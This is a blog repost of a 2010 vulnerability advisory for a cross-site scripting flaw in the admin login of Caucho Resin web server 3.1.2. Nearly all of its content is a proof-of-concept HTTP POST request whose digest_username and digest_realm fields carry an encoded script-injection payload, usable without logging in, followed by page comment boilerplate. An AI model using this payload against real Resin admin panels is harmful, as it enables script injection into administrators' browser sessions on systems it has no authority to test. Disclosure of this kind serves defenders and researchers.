/home/mb3e/

♺ Google is the best teacher ♺ | University of Gunadarma IT ☺

Caucho Resin web server 3.1.2 Admin Login XSS Vulnerabilit

Text : 


# Exploit Title:Caucho Resin web server 3.1.2 Admin Login
digest_username&digest_realm XSS Vulnerability
# Date: 2010-05-17
# Author: flyh4t
# Software Link: http://www.caucho.com/
# Version: Professional 3.1.2
# CVE : no



P0C:(no need of login)



POST /resin-admin/ HTTP/1.1
Accept: */*
Referer: http://1.1.1.1/resin-admin/
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0;
SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; msn OptimizedIE8;ZHCN)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 1.1.1.1
Content-Length: 194
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: JSESSIONID=abc7CGMIyBwpNgFko8MIs



digest_username=aaa%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3C%22&
digest_password1=&digest_password2=&digest_realm=aaa%22%3E%3Cscript
%3Ealert%281%29%3C%2Fscript%3E%3C%22&digest_attempt=true




Arrow  References :  http://securityreason.com/wlb_show/WLB-2010050108
  • Caucho Resin web server 3.1.2 Admin Login XSS Vulnerabilit
  • Unknown
  • May 20, 2010
  • No comments:
 

0 comments:

Post a Comment

silahkan tinggalkan komentar anda disini .. :D

Subscribe to: Post Comments (Atom)